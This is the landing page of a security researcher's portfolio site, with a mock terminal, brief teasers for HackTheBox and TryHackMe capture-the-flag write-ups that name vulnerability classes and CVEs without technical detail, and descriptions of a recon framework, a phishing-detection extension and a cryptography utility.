Web Pentester • Bug Hunter

root.sec

Breaking into web applications, hunting vulnerabilities, and building security tools. Documenting the journey along the way.

Cheatsheets View Writeups

root@sec — zsh

root@sec:~$ cat focus.txt

* Web Application Pentesting
* Bug Bounty Hunting
* Vulnerability Research
* Security Tooling

root@sec:~$ ls projects/

HybridReconX/ SafeClick/ KeySec/

root@sec:~$ ./status.sh

✓ Hunting Bugs & Securing Systems

root@sec:~$

What I Do

Bug Hunting & Ethical Hacking

Breaking web apps, finding vulnerabilities, and documenting the hunt

CTF Writeups

Walkthroughs of HackTheBox and TryHackMe machines with methodology breakdowns.

Bug Bounty

Real-world vulnerability discoveries, hunting techniques, and responsible disclosure stories.

Technical Deep Dives

In-depth analysis of attack vectors, security tools, and exploitation techniques.

Recent Writeups

View all

HackTheBoxMedium

HackTheBox – DevArea

Detailed exploitation walkthrough for HackTheBox DevArea machine, covering Apache CXF SSRF (CVE-2022-46364), Hoverfly middleware RCE, and world-writable bash privilege escalation.

Read Writeup

TryHackMeEasy

A detailed walkthrough for the mKingdom machine on TryHackMe. This write-up covers CMS password guessing, achieving initial access via PHP file upload, pivoting through multiple users using discovered credentials and tokens, and finally escalating to root through a writable /etc/hosts file and a malicious cron script.

Read Writeup

TryHackMeHard

Plant Photography

A comprehensive deep-dive into the Plant Photography room from TryHackMe. This write-up covers the exploitation of SSRF to achieve Local File Inclusion, extracting sensitive system data, and reconstructing the Werkzeug debugger PIN to gain full Remote Code Execution via an unauthenticated console.

Read Writeup

HackTheBoxEasy

HackTheBox – CCTV

Exploitation walkthrough for HackTheBox CCTV machine, covering ZoneMinder SQL injection, motionEye credential theft, and CVE-2025-60787 RCE for root access.

Read Writeup

View all Writeups

Featured Projects

View all Projects

Security Tool

HybridRecon X

Docker-based, context-aware recon and pentesting framework that fingerprints targets, adapts scans based on detected technologies and WAFs.

BashDockerLinux

Browser Extension

SafeClick

Chrome extension that analyzes websites in real time to determine their trust score. Detects phishing sites using threat intelligence databases and logic operations.

JavaScriptChrome APIs

Web App

KeySec

Modern web application for cryptographic operations: hashing, encodings, encryption/decryption, and text analysis utilities with an intuitive UI.

React.jsWeb Crypto

View all Projects

Ready to secure your assets?

Let's collaborate on security research, penetration testing, or just chat about the latest vulnerabilities.

Get in Touch View GitHub